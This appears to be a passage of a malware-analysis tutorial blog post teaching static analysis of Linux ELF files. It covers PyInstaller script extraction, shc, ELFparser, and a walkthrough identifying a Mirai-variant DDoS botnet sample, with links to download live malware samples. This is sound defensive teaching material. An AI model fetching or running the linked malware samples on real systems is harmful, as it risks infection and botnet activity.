https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21-300x103.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21-1024x353.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21-768x265.png 768w " sizes="(max-width: 1527px) 100vw, 1527px" /></noscript></a></p>
<p>We can extract the python script from the ELF binary by using <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener noreferrer nofollow">pyinstxtractor</a>. Follow <a href="https://github.com/extremecoders-re/pyinstxtractor/wiki/Extracting-Linux-ELF-binaries" target="_blank" rel="noopener noreferrer nofollow">this guide</a> on how to apply it to ELF files. Note that the python version you use to run <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener noreferrer nofollow">pyinstxtractor</a> should be the same version used in the binary you are analyzing. If there is a mismatch, <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener noreferrer nofollow">pyinstxtractor</a> will issue a warning.</p>
<p>Let’s try it ourselves (<a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/test_pyinstaller" target="_blank" rel="noopener noreferrer nofollow">download the compiled file form here</a>):</p>
<p>First, let’s compile a Pyinstaller file:</p>
<ol style="color: #627d98;">
<li>Install Python and Pyinstaller on your VM:<strong>sudo apt update<br />
sudo apt install -y python3<br />
sudo apt install -y python3-pip<br />
sudo pip3 install pyinstaller</strong></li>
</ol>
<ol start="2">
<li style="color: #627d98;">Create a simple python script code with test_pyinstaller.py:<strong>nano test_pyinstaller.py</strong>Copy the following script to test_pyinstaller.py:<strong>for i in range(1,6):<br />
print(f&#8221;this is output #{i}&#8221;)</strong>And save (ctrl+x).</li>
</ol>
<ol style="color: #627d98;" start="3">
<li>Compile the file with Pyinstaller:<strong>pyinstaller<strong> &#8211;onefile test_pyinstaller.py</strong></strong>Pyinstaller created 2 directories in the source folder: <strong>dist</strong> and <strong>build</strong>. The compiled file is in the <strong>/dist</strong> directory. You can run the file and also examine the <strong>pydata</strong> section and its strings.<img loading="lazy" width="702" height="164" class="aligncenter size-full wp-image-11725 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png 702w, https://www.intezer.com/wp-content/uploads/2020/08/22-300x70.png 300w" data-lazy-sizes="(max-width: 702px) 100vw, 702px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="702" height="164" class="aligncenter size-full wp-image-11725" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22.png 702w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/22-300x70.png 300w " sizes="(max-width: 702px) 100vw, 702px" /></noscript><img loading="lazy" width="483" height="192" class="aligncenter size-full wp-image-11726 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png 483w, https://www.intezer.com/wp-content/uploads/2020/08/23-300x119.png 300w" data-lazy-sizes="(max-width: 483px) 100vw, 483px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="483" height="192" class="aligncenter size-full wp-image-11726" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23.png 483w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/23-300x119.png 300w " sizes="(max-width: 483px) 100vw, 483px" /></noscript></li>
</ol>
<p>Extraction of the python script from the compiled binary:</p>
<ol style="color: #627d98;">
<li>Download <a href="https://github.com/extremecoders-re/pyinstxtractor" target="_blank" rel="noopener noreferrer nofollow">pyinextractor</a> and <a href="https://pypi.org/project/uncompyle6/" target="_blank" rel="noopener noreferrer nofollow">uncompyle6</a>:<strong>sudo apt install -y git<br />
git clone https://github.com/extremecoders-re/pyinstxtractor.git<br />
sudo pip3 install uncompyle6</strong></li>
</ol>
<ol style="color: #627d98;" start="2">
<li>Dump the pydata section using objcopy. This section holds the pyc (Python bytecodes). Let’s work in a clean directory.<strong>mkdir training-pyinstaller<br />
cd training-pyinstaller<br />
objcopy &#8211;dump-section pydata=pydata.dump ../dist/test_pyinstaller</strong></li>
</ol>
<ol style="color: #627d98;" start="3">
<li>Run pyinstxtractor on the pydata dump:<strong>python3 ../pyinstxtractor/pyinstxtractor.py pydata.dump</strong>You should receive the following output:<img loading="lazy" width="1143" height="328" class="aligncenter size-full wp-image-11727 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png 1143w, https://www.intezer.com/wp-content/uploads/2020/08/24-300x86.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/24-1024x294.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/24-768x220.png 768w" data-lazy-sizes="(max-width: 1143px) 100vw, 1143px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1143" height="328" class="aligncenter size-full wp-image-11727" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24.png 1143w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24-300x86.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24-1024x294.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/24-768x220.png 768w " sizes="(max-width: 1143px) 100vw, 1143px" /></noscript>pyinstxtractor created a directory named <strong>pydata.dump_extracted</strong>. Please note that the tool suggests possible entry points (in our example we know its <strong>test_pyinstaller.pyc</strong>).</li>
</ol>
<ol start="4">
<li style="color: #627d98;">Decompile the relevant pyc file using uncompyle6. uncompyle6 is a Python decompiler that translates Python bytecode to equivalent Python source code:<strong>cd pydata.dump_extracted<br />
uncompyle6 test_pyinstaller.pyc</strong>We have now successfully extracted the Python code:<img loading="lazy" width="886" height="226" class="aligncenter size-full wp-image-11728 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png 886w, https://www.intezer.com/wp-content/uploads/2020/08/25-300x77.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/25-768x196.png 768w" data-lazy-sizes="(max-width: 886px) 100vw, 886px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="886" height="226" class="aligncenter size-full wp-image-11728" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25.png 886w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25-300x77.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/25-768x196.png 768w " sizes="(max-width: 886px) 100vw, 886px" /></noscript></li>
</ol>
<p><strong>shc</strong><br />
<a href="https://github.com/neurobin/shc" target="_blank" rel="noopener noreferrer nofollow">shc</a> is a shell script compiler. Files that were compiled with shc have specific strings. You can use the <a href="https://github.com/intezer/ELF-Malware-Analysis-101/blob/master/Part-2-Initial-Analysis/YARA/interpretes.yar" target="_blank" rel="noopener noreferrer nofollow">YARA signature</a> to detect them along with code reuse. <a href="https://github.com/yanncam/UnSHc" target="_blank" rel="noopener noreferrer nofollow">UnSHc</a> tool can be used to extract the compiled bash script from files that were compiled with older shc versions (there currently isn’t a public solution for extracting the script from later versions of this tool).</p>
<p><strong>Bottom Line</strong><br />
We suspect a file is an interpreter when the file has:</p>
<ol style="color: #627d98;">
<li>Interpreter code reuse</li>
<li>High entropy (in some cases)</li>
<li>Interpreter signature such as unique strings and section names</li>
</ol>
<p>Next steps will be:</p>
<ol style="color: #627d98;">
<li>If there is a script extraction solution, we will run it on the binary.</li>
<li>If there isn’t an available script extraction solution, we will proceed to dynamic analysis.</li>
</ol>
<p><strong style="font-size: 20px;">ELFparser Tool</strong><br />
<a href="http://elfparser.com/" target="_blank" rel="noopener noreferrer nofollow">Elfparser</a> is an open source project which as of this publication date hasn&#8217;t been updated in the last few years. With that being said, this tool is useful for initial analysis when you want to search for suspects and indicators of the file&#8217;s functionalities. In addition to parsing the ELF file to its various tables which are relevant for initial analysis, the tool contains embedded signatures based on the file’s static artifacts which are translated to “capabilities”. These capabilities are then translated to a final score. The higher the score, the more suspicious the file is. This score should be taken with slight skepticism, as the indicator is prone to false positives and trusted files can also come up as highly suspicious.</p>
<p>Let’s upload our training file to the ELFparser tool:</p>
<p><img loading="lazy" width="526" height="192" class="aligncenter size-full wp-image-11729 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png 526w, https://www.intezer.com/wp-content/uploads/2020/08/26-300x110.png 300w" data-lazy-sizes="(max-width: 526px) 100vw, 526px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="526" height="192" class="aligncenter size-full wp-image-11729" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26.png 526w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/26-300x110.png 300w " sizes="(max-width: 526px) 100vw, 526px" /></noscript></p>
<p>It maps the system and popen function to their relevant categories and recognizes the embedded IP address.</p>
<p><strong style="font-size: 20px;">Real Life Sample Analysis</strong><br />
Now, the moment you have been waiting for. In this section, we will analyze a real ELF malware sample and you will be given 3 additional samples so you can practice initial ELF analysis on your own time. You can find the <a href="https://github.com/intezer/ELF-Malware-Analysis-101/tree/master/Part-2-Initial-Analysis/Real-life-examples/Exercise" target="_blank" rel="noopener noreferrer nofollow">exercise samples here</a>.</p>
<p>Let&#8217;s download this <a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Real-life-examples/Example/8cb7b286f4284afccee5f9b9e2ac143fc954c377ef2891474feccb0b223a9537.sample" target="_blank" rel="noopener noreferrer nofollow">sample</a> and open it with ELFparser so that we can obtain an initial overview of the file.</p>
<p><img loading="lazy" width="703" height="300" class="aligncenter size-full wp-image-11730 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png 703w, https://www.intezer.com/wp-content/uploads/2020/08/27-300x128.png 300w" data-lazy-sizes="(max-width: 703px) 100vw, 703px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="703" height="300" class="aligncenter size-full wp-image-11730" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27.png 703w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/27-300x128.png 300w " sizes="(max-width: 703px) 100vw, 703px" /></noscript></p>
<p>Elfparser recognizes the file as UPX packed. Let’s unpack the file using <strong>upx -d</strong>.</p>
<p>Now that we have unpacked the file, let’s open it again in ELFparser. You can see that the file has symbols and ELFparser has gathered some capabilities:</p>
<p><img loading="lazy" width="505" height="486" class="aligncenter size-full wp-image-11731 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png 505w, https://www.intezer.com/wp-content/uploads/2020/08/28-300x289.png 300w" data-lazy-sizes="(max-width: 505px) 100vw, 505px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="505" height="486" class="aligncenter size-full wp-image-11731" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28.png 505w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/28-300x289.png 300w " sizes="(max-width: 505px) 100vw, 505px" /></noscript></p>
<p>The file is likely generating HTTP requests as part of its functionality. The User-Agent and Host headers are variables (based on %s).</p>
<p>Let’s run the strings command on the file.</p>
<p>The file contains a great deal of strings which look like user agents. We can assume they might be related to the HTTP request identified by ELFparser and that the binary is using different user agents to avoid being blocked by the host that it&#8217;s attempting to contact.</p>
<p><img loading="lazy" width="1600" height="698" class="aligncenter size-full wp-image-11732 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png 1600w, https://www.intezer.com/wp-content/uploads/2020/08/29-300x131.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/29-1024x447.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/29-768x335.png 768w, https://www.intezer.com/wp-content/uploads/2020/08/29-1536x670.png 1536w" data-lazy-sizes="(max-width: 1600px) 100vw, 1600px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1600" height="698" class="aligncenter size-full wp-image-11732" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29.png 1600w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29-300x131.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29-1024x447.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29-768x335.png 768w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/29-1536x670.png 1536w " sizes="(max-width: 1600px) 100vw, 1600px" /></noscript></p>
<p>At this point, we may suspect that we are not dealing with a trusted file and that it might also be related to some DDoS malware, but we should gather more information first before making this conclusion.</p>
<p>Let’s look at the file’s symbols. Because it contains many symbols, use readelf and grep each symbol type separately.</p>
<p><strong>readelf -s training-sample | grep FUNC</strong></p>
<p>The file contains some unusual and suspicious function names:<br />
<strong>FindRandIP, tcpFl00d, udpfl00d</strong></p>
<p>We can almost certainly conclude that this file is a malware. Let’s do a quick google search for these unique functions so we can classify the file. We receive search results for Mirai and Gafgyt analysis. It’s now clear that this file is a botnet which is a variant of Mirai.</p>
<p><strong style="font-size: 20px;">Golang Files</strong><br />
There is a new trend we are seeing where ELF malware is written in Golang. <a href="https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/" target="_blank" rel="noopener noreferrer nofollow">Kaiji</a>, <a href="https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html" target="_blank" rel="noopener noreferrer nofollow">NOTROBIN</a>, and <a href="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" target="_blank" rel="noopener noreferrer nofollow">Kinsing</a> are just some examples.</p>
<p>Golang files have a different structure than classic ELF files. We will soon publish an article explaining the ELF Golang format and how to analyze these binaries. Stay tuned!</p>
<p><strong style="font-size: 20px;">Conclusion</strong><br />
We reviewed initial ELF analysis with an emphasis on static analysis. We detailed the different artifacts and components that are relevant for initial analysis and learned how they can help us gather immediate insights about a file. We also explained which tools can be used to gather those insights.</p>
<p>Initial analysis is the first step you should take when approaching a file but it’s not always enough to determine a file’s verdict and classify the threat if it’s malicious. A file can be packed, stripped, or just not informative enough to make an assessment during the initial analysis phase. In part 3, we will review the next step in ELF file analysis: dynamic analysis. You will learn what information can be extracted from this step and which tools can be used to gather it.</p>
<p><a id="contentbanneranalyzefooter" href="https://analyze.intezer.com/create-account?banner=contentbanneranalyzefooter"><img loading="lazy" width="750" height="300" class="aligncenter size-full wp-image-12310 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png" data-slb-group="post-images" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png 750w, https://www.intezer.com/wp-content/uploads/2020/09/AnalyzeA_750_300-300x120.png 300w" data-lazy-sizes="(max-width: 750px) 100vw, 750px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="750" height="300" class="aligncenter size-full wp-image-12310" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300.png 750w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_300-300x120.png 300w " sizes="(max-width: 750px) 100vw, 750px" /></noscript></a></p>
<div class="author-box-bottom clearfix"><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/IMG_20200610_100615-60x60.jpg" class="user-photo"><div class="user-bio"><strong> Avigayil Mechtinger</strong><div class="share-author"></div><p>Avigayil is a product manager at Intezer, leading Intezer Analyze product lifecycle. Prior to this role, Avigayil was part of Intezer's research team and specialized in malware analysis and threat hunting. During her time at Intezer, she has uncovered and documented different malware targeting both Linux and Windows platforms.</p></div></div><div class="post-tags"> <a href="https://www.intezer.com/tag/malware-analysis/" rel="tag">Malware Analysis</a></div><nav class="post-nav clearfix"><div class="prev-post"><a href="https://www.intezer.com/blog/cloud-security/community-beta-announcement/" rel="prev"></a><div class="post-link clear"><h4><a href="https://www.intezer.com/blog/cloud-security/community-beta-announcement/" rel="prev">Community Beta Announcement</a></h4></div></div><div class="next-post"><a href="https://www.intezer.com/blog/malware-analysis/turning-open-source-against-malware/" rel="next"></a><div class="post-link clear"><h4><a href="https://www.intezer.com/blog/malware-analysis/turning-open-source-against-malware/" rel="next">Turning Open Source Against Malware</a></h4></div></div></nav>        <div class="related-posts">
            <h3>Recommended Articles</h3>
            <ul class="row related-cont">
                    	    <li class="related-single">
                    <span class="thumb">
                    <a href="https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/" title=""><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2022/02/BlogImage1024x475-253x139.png" alt="TeamTNT Cryptomining Explosion &#x1f9e8;" class="post-thumb" /></a>                    </span>
					                    <span class="read-time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 37</span> <span class="rt-label rt-postfix"></span></span></span>
                    <h4>
                        <a href="https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/">TeamTNT Cryptomining Explosion &#x1f9e8;</a>
                    </h4>
					
						
				                    <span class="post-excerpt">This post was originally published as a white paper in September 2021. Get the...</span>	
                    <span class="post-date">18 February 2022</span>
        		</li>
        	        	    <li class="related-single">
                    <span class="thumb">
                    <a href="https://www.intezer.com/blog/product-updates/automatically-scan-urls-and-analyze-malware/" title=""><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2022/02/PhishingURL_BlogCover_1024x475_Part01-copy-253x139.png" alt="Beyond Files: Automate URL Analysis with Intezer Analyze" class="post-thumb" /></a>                    </span>
					                    <span class="read-time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix"></span></span></span>
                    <h4>
                        <a href="https://www.intezer.com/blog/product-updates/automatically-scan-urls-and-analyze-malware/">Beyond Files: Automate URL Analysis with Intezer Analyze</a>
                    </h4>
					
						
				                    <span class="post-excerpt">As part of our ongoing effort to allow you to investigate any security incident,...</span>	
                    <span class="post-date">16 February 2022</span>
        		</li>
        	        	    <li class="related-single">
                    <span class="thumb">
                    <a href="https://www.intezer.com/blog/malware-analysis/save-incident-response-time-intezer-analyze/" title=""><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2021/12/Blog-illustration-for-Nicole-253x139.png" alt="3 Ways to Save Incident Response Time" class="post-thumb" /></a>                    </span>
					                    <span class="read-time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 7</span> <span class="rt-label rt-postfix"></span></span></span>
                    <h4>
                        <a href="https://www.intezer.com/blog/malware-analysis/save-incident-response-time-intezer-analyze/">3 Ways to Save Incident Response Time</a>
                    </h4>
					
						
				                    <span class="post-excerpt">Save time during incident response with these tips and tools to help your team...</span>	
                    <span class="post-date">31 January 2022</span>
        		</li>
        	            </ul>
        </div>
</div></div><div class="col-md-1"></div></div>
		    </div>
			
		
	    </div>
		

    </div>

<script>

	
$(document).ready(function() {
	$('.form-title').val('Subscribe to Blog Side');
	    $('div.single-post-page').find('a').addClass('blog-text-link');
	 $( "div.btn-sub-show" ).click(function() {
$("div.blog-side-subscribe").addClass("show");
 
});

		
		 var blogbtn = $('div.blog-side-subscribe').offset();

    var $window = $(window);
        if ( $window.scrollTop() >= blogbtn.top - 100) {
            $("div.side-blog-btn").addClass("fixed");
            $("div.side-blog-share").addClass("fixed");
			$("div.blog-side-subscribe").addClass("fixed");
			//$("div.btn-sub-show").addClass("fixed");
        }
else if( $window.scrollTop() < blogbtn.top - 100){
          $("div.side-blog-btn").removeClass("fixed");
          $("div.side-blog-share").removeClass("fixed");
		$("div.blog-side-subscribe").removeClass("fixed");
		//$("div.btn-sub-show").removeClass("fixed");
//$("div.blog-side-subscribe").removeClass("show");
        }
    
    $window.scroll(function() {
        if ( $window.scrollTop() >= blogbtn.top - 100) {
            $("div.side-blog-btn").addClass("fixed");
            $("div.side-blog-share").addClass("fixed");
			$("div.blog-side-subscribe").addClass("fixed");
			//$("div.btn-sub-show").addClass("fixed");
        }
else if( $window.scrollTop() < blogbtn.top - 100){
          $("div.side-blog-btn").removeClass("fixed");
          $("div.side-blog-share").removeClass("fixed");
		$("div.blog-side-subscribe").removeClass("fixed");
		//$("div.btn-sub-show").removeClass("fixed");
	//$("div.blog-side-subscribe").removeClass("show");
        }
		
    });			
});  
   

    </script>
<footer>
            <div class="container">
                <div class="row">
					<div class="footer-logo-cont"><img src="https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/images/intezer-logo-b.png" alt="intezer footer logo" width="95" height="24" title="" class="footer-logo">
						<div class="social footer-right">
                            <ul>
<li><a href="https://www.youtube.com/channel/UCt5L5ztHh-C1NCKa6bKjXFQ?view_as=subscriber" target="_blank"><i class="fa fa-youtube" aria-hidden="true" title="youtube"></i></a></li>
								<li><a href="https://www.facebook.com/IntezerLabs/" target="_blank"><i class="fa fa-facebook" aria-hidden="true" title="facebook"></i></a></li>
								 <li><a href="https://www.linkedin.com/company/intezer-labs" target="_blank"><i class="fa fa-linkedin" aria-hidden="true" title="Linkedin"></i></a></li>
                                <li><a href="https://twitter.com/intezerlabs" target="_blank"><i class="fa fa-twitter" aria-hidden="true" title="twitter"></i></a></li>
 								<li><a href="https://www.intezer.com/feed/"><i class="fa fa-rss" aria-hidden="true" title="RSS"></i></a></li>
                            </ul>
                        </div>
					</div>

                    <div class="footer-left">
						
                        <ul id="menu-footer-1" class="footer-1"><li id="menu-item-20981" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-20981 nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0);" data-toggle="dropdown" aria-haspopup="true">Solutions </a>
<ul role="menu" class="dropdown-menu">
	<li id="menu-item-1453" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1453 nav-item"><a class="nav-link" href="https://www.intezer.com/intezer-analyze/">Analyze</a></li>
	<li id="menu-item-12276" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12276 nav-item"><a class="nav-link" href="https://www.intezer.com/intezer-protect/">Protect</a></li>
</ul>
</li>
<li id="menu-item-213" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-213 nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0);" data-toggle="dropdown" aria-haspopup="true">Learn </a>
<ul role="menu" class="dropdown-menu">
	<li id="menu-item-15963" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-15963 nav-item"><a class="nav-link" href="https://www.intezer.com/blog/">Blog</a></li>
	<li id="menu-item-2061" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2061 nav-item"><a class="nav-link" href="https://www.intezer.com/resources/">Resources</a></li>
	<li id="menu-item-15892" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15892 nav-item"><a class="nav-link" href="https://support.intezer.com/hc/en-us">Docs &#038; API</a></li>
	<li id="menu-item-21934" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21934 nav-item"><a class="nav-link" href="https://www.intezer.com/security/">Security</a></li>
</ul>
</li>
<li id="menu-item-20982" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-20982 nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0);" data-toggle="dropdown" aria-haspopup="true">Company </a>
<ul role="menu" class="dropdown-menu">
	<li id="menu-item-215" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215 nav-item"><a class="nav-link" href="https://www.intezer.com/about/">About</a></li>
	<li id="menu-item-216" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-216 nav-item"><a class="nav-link" href="https://www.intezer.com/contact-us/">Contact Us</a></li>
	<li id="menu-item-7169" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7169 nav-item"><a class="nav-link" href="https://www.intezer.com/partners/">Partners</a></li>
	<li id="menu-item-7168" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7168 nav-item"><a class="nav-link" href="https://www.intezer.com/intezer-news/">News</a></li>
	<li id="menu-item-7167" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7167 nav-item"><a class="nav-link" href="https://www.intezer.com/intezer-events/">Events</a></li>
	<li id="menu-item-8418" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8418 nav-item"><a class="nav-link" href="https://www.intezer.com/careers/">Careers</a></li>
</ul>
</li>
</ul>                    </div>
					
	
                </div>
            </div>
			
        </footer>
        <div id="credit">
            <div class="container">
                <div>
               
                © Intezer.com 2022 All rights reserved					 
                        <ul id="menu-footer-2" class="footer-2"><li id="menu-item-59" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-59"><a href="https://www.intezer.com/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-222" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-222"><a href="https://www.intezer.com/privacy/">Privacy Policy</a></li>
</ul>
                </div> 
						
            </div>       
        </div>

        <script type="text/javascript">
	$(window).scroll(function() {
    var nav = $('#main-menu');
    var toppopheight = $('#top-bar-spacer').height();
    var top = 140;
    if ($(window).scrollTop() >= top) {
        nav.addClass('botborder');
		nav.css({ top: toppopheight });
    } else {
        nav.removeClass('botborder');
     nav.css({ top: 0 });
    }
});
</script>
	   <link rel='stylesheet' id='elementor-frontend-legacy-css'  href='https://149520725.v2.pressablecdn.com/wp-content/uploads/elementor/css/custom-frontend-legacy.min.css?ver=3.6.3' media='all' />
<link rel='stylesheet' id='elementor-frontend-css'  href='https://149520725.v2.pressablecdn.com/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1649858495' media='all' />
<link   data-wpacu-apply-media-query='screen and (min-width: 1024px)' rel='stylesheet' id='elementor-post-16929-css'  wpacu-elementor-post-16929-href='https://149520725.v2.pressablecdn.com/wp-content/uploads/elementor/css/post-16929.css?ver=1649858492' media='all' /><script>
function wpacu_elementor_post_16929_match_media(wpacu_elementor_post_16929_match_media_var) {
    if (wpacu_elementor_post_16929_match_media_var.matches) { 
        var wpacuHrefAttr = document.querySelectorAll("[wpacu-elementor-post-16929-href]")[0].getAttribute('wpacu-elementor-post-16929-href');
        document.querySelectorAll("[wpacu-elementor-post-16929-href]")[0].setAttribute('href', wpacuHrefAttr); 
    }
}
try { var wpacu_elementor_post_16929_match_media_var = window.matchMedia("screen and (min-width: 1024px)"); wpacu_elementor_post_16929_match_media(wpacu_elementor_post_16929_match_media_var); wpacu_elementor_post_16929_match_media_var.addListener(wpacu_elementor_post_16929_match_media); }
catch (wpacuError) {
	var wpacuHrefAttr = document.querySelectorAll("[wpacu-elementor-post-16929-href]")[0].getAttribute('wpacu-elementor-post-16929-href');
    document.querySelectorAll("[wpacu-elementor-post-16929-href]")[0].setAttribute('href', wpacuHrefAttr); 
}
</script>
<link rel='stylesheet' id='elementor-post-8921-css'  href='https://149520725.v2.pressablecdn.com/wp-content/uploads/elementor/css/post-8921.css?ver=1649858491' media='all' />
<link rel='stylesheet' id='elementor-pro-css'  href='https://149520725.v2.pressablecdn.com/wp-content/uploads/elementor/css/custom-pro-frontend-lite.min.css?ver=1649858497' media='all' />
<script   type='text/javascript' src='https://c0.wp.com/c/5.9.3/wp-includes/js/dist/vendor/regenerator-runtime.min.js' id='regenerator-runtime-js'></script>
